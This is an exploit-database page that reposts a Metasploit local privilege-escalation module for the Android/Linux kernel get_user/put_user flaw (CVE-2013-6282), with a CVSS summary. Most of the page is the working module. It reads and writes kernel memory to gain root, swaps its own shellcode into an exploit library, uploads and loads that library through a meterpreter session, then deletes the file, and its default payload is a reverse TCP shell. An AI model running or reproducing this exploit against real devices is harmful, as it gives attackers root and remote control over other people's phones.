Android get_user/put_user Exploit

2016.12.27
Credit: timwr
Risk: High
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Common def initialize(info={}) super( update_info( info, { 'Name' => "Android get_user/put_user Exploit", 'Description' => %q{ This module exploits a missing check in the get_user and put_user API functions in the linux kernel before 3.5.5. The missing checks on these functions allow an unprivileged user to read and write kernel memory. This exploit first reads the kernel memory to identify the commit_creds and ptmx_fops address, then uses the write primitive to execute shellcode as uid 0. The exploit was first discovered in the wild in the vroot rooting application. }, 'License' => MSF_LICENSE, 'Author' => [ 'fi01', # libget_user_exploit / libput_user_exploit 'cubeundcube', # kallsyms_in_memory 'timwr', # Metasploit module ], 'References' => [ [ 'CVE', '2013-6282' ], [ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2434453' ], [ 'URL', 'https://github.com/fi01/libget_user_exploit' ], [ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2565758' ], ], 'DisclosureDate' => "Sep 06 2013", 'SessionTypes' => [ 'meterpreter' ], "Platform" => [ "android", "linux" ], 'Targets' => [[ 'Automatic', { }]], 'Payload' => { 'Space' => 2048, }, 'DefaultOptions' => { 'WfsDelay' => 120, 'PAYLOAD' => 'linux/armle/mettle/reverse_tcp', }, 'DefaultTarget' => 0, } )) end def exploit local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2013-6282.so" ) exploit_data = File.read(local_file, {:mode => 'rb'}) space = payload_space payload_encoded = payload.encoded # Substitute the exploit shellcode with our own exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space)) workingdir = session.fs.dir.getwd remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}" write_file(remote_file, exploit_data) print_status("Loading exploit library #{remote_file}") session.core.load_library( 'LibraryFilePath' => local_file, 'TargetFilePath' => remote_file, 'UploadLibrary' => false, 'Extension' => false, 'SaveToDisk' => false ) print_status("Loaded library #{remote_file}, deleting") session.fs.file.rm(remote_file) print_status("Waiting #{datastore['WfsDelay']} seconds for payload") end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top